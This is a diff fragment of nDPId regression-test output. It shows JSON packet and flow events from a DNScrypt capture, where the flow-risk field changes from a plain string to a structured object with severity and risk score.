-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":87,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":36668,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02417{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAXc60IgAL0RfggKAAABMw96+phfAbsGBFB4xkQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAXDAAwFvwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00685{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00794{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":88,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00426{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAABQ60IAub0RotsKAAABMw96+gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00208{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":89,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01134{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":946739304789,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739304789,"pkt":"REREREREZmZmZmZmCABFAAIc60NAAL0RYccKAAABMw96+pXaAbsCCHDfxkUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAQAAAAAAAAAAAAHHAAwBwwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00681{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739304789,"flow_last_seen":946739304789,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739304789,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38362,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":946739304791,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739304791,"pkt":"ZmZmZmZmRERERERECABFAADSRcUAADIREz4pT0UNCgAAAQG723EAvtvWBsGBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":946739304793,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739304793,"pkt":"ZmZmZmZmRERERERECABFAADSRcgAADIREzspT0UNCgAAAQG72usAvtxZBsSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="}
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":946739304804,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"ts_msec":946739304804,"pkt":"ZmZmZmZmRERERERECABFAADSRcQAADIREz8pT0UNCgAAAQG7lPgAviJOBsOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAJ0egRkMHduA2JpegAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAA1OqoPAErbOR3M17\/\/Kp81C0M1irw8YLMFAcPIvcR6xyplTIczMGQTrzWWN9IPA9l2Zy1iwuUTL7se0EmV4wWC0NhfmNsLEH2LkBE84etohseSn740G5SsmjVFMMQ1O1aQ2F+Y2wsQfZfU52hX1OdoV9U7yE="}
@@ -213,26 +213,26 @@
 00696{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":946739304821,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"ts_msec":946739304821,"pkt":"ZmZmZmZmRERERERECABFAADTDfVAADURyF8zD3r6CgAAAQG7mF8Av3inxkSBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAxzY2FsZXdheS1hbXMAABAAAcAMABAAAQAAcIAAfXxETlNDAAIAANmtKqgh6GipMki1mJfjDA0AnYgv5x5ccE3t3oFTaUI52T95jfN1yOwZ4Avs9tatx4lCV7PDmZkXQULOG2i1+g8X39eqNuFP4dSqiJZOoeF4tcdLtZP0Xezh1C6PMdZNUhff16o24U\/hAAAAAV9TeY1fVMsN"}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1NAAL0RVBEKAAABizvIdOhUAbsCCBaGc5UBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59476,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1RAAL0RVBAKAAABizvIdLjtAbsCCBaGc5EBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":47341,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01135{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":946739305155,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739305155,"pkt":"REREREREZmZmZmZmCABFAAIcU1VAAL0RVA8KAAABizvIdMSfAbsCCBaGc5MBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAJ1awAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739305155,"flow_last_seen":946739305155,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739305155,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":43633,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
